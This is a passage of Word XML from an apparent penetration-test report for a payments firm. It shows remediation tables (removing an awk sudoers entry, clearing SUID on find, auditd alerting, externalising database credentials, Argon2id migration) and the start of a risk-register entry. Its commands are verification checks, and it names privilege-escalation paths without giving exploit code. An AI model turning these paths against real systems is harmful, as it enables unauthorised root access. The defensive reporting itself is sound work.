                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>sudoers line 92 removed; visudo -c passes.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7E660A95" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>sudo -l as msfadmin does NOT show "/usr/bin/awk" entry.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="67E463E4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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3E7F7148" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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3A29B26B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Drop SUID on /usr/local/bin/find; nosuid on /tmp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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6CAE95D9" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>System Admin</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0B7A404" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>fstab updated; SUID bit cleared; reboot validated.</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201BDC6F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>find / -perm -4000 returns the 24 standard binaries only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="0098155F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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FD917CE" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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6730046" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Deploy auditd setuid_exec rules; pipe to SIEM.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4DE2705" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>SOC Engineer</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98B9706" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>auditctl -l shows the new rule; SIEM dashboard shows alerts in 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B2DA176" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Test execve with euid=0 from auid&gt;=1000 triggers SIEM alert in &lt;2 min.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65788765" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc229906617"/>
      <w:r>
        <w:t>Window 2 — Days 31 to 60 (Strategic Initiatives)</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
        <w:gridCol w:w="2700"/>
        <w:gridCol w:w="1700"/>
        <w:gridCol w:w="2426"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="53DECE87" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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5BEF1C23" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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7F1745F9" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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3AE46ACD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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67E2125D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Milestone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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66E75618" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Success metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="4ABDB3FE" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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5A5FBE5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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BBD346A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Externalise DB credentials from gconfig.php.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5490B780" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>DevOps + Vendor</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EDC800B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Vendor delivers patched gconfig.php that reads from env; deployed to vendor-eval-01.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7C28F7F7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>curl -s http://vendor-eval-01/gallery/gconfig.php (with directory listing on) does NOT reveal credentials.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="60388A04" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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6AAEFB73" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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5F1655C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Decision on vendor VM acceptance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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28CA5A8E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Procurement + Sec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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600D525" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Procurement decision recorded: accept conditionally / reject / re-tender.</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18FDEB4C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Decision memo signed by CISO and CFO.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74139943" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc229906618"/>
      <w:r>
        <w:t>Window 3 — Days 61 to 90 (Heavy / Vendor-dependent)</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
        <w:gridCol w:w="2700"/>
        <w:gridCol w:w="1700"/>
        <w:gridCol w:w="2426"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="40ED2C20" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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2EEB8911" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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1CF6100B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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26D238AF" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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69D55E60" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Milestone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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399269AF" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Success metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="2E9A9144" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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5C2A163" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>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76B64407" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Migrate password storage to Argon2id (m=64MiB, t=3, p=2).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495CC46B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Vendor + Engineering</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6E80ABA" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>New code deployed; users on next login are re-hashed.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EF02A7C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>50% of active accounts re-hashed by Day 90; 100% by Day 120 with monitoring.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="51AD4D6F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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AC3BCB5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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22B783F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Engagement re-test (paid separately).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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18B0D28B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Triton Security Labs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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289E72D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Triton re-runs the engagement against the patched assets.</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F768A88" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Re-test report shows F1–F5 closed; new findings (if any) below High.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="008086DA" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The most common error in this kind of plan is to distribute one third of items into each window. Real-world incident response and remediation is asymmetric: most of the value clusters in Window 1, most of the complexity in Window 3, and the middle window absorbs the items that cross organisational boundaries. The split above reflects that reality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC1FF68" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc229906619"/>
      <w:r>
        <w:t>7.4  Risk Register Entry</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="76702B0C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The entry below is formatted for direct insertion into Cassandra Pay's Information Risk Register (instance maintained by Internal Audit). One entry covers the most critical finding; per the firm's normal practice, smaller findings would each receive their own entry, omitted here for brevity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483050BD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>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626"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="4C6616B7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400"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0096335D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6626" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D3D1BF4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="7A5E0311"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03823CDE" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Risk ID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3665CC5E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>RISK-2026-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="6871B748"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3A8A9FA" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Risk Description</w:t>
            </w:r>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88D869A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Unauthorised privilege escalation on payment-processing-adjacent staging server due to an over-permissive sudoers rule.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="2F2C48F1"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D91303A" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Inherent Risk</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75F41090" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>High (without compensating controls).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="29F17174"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50F71D4B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Current Controls</w:t>
            </w:r>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332B949F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
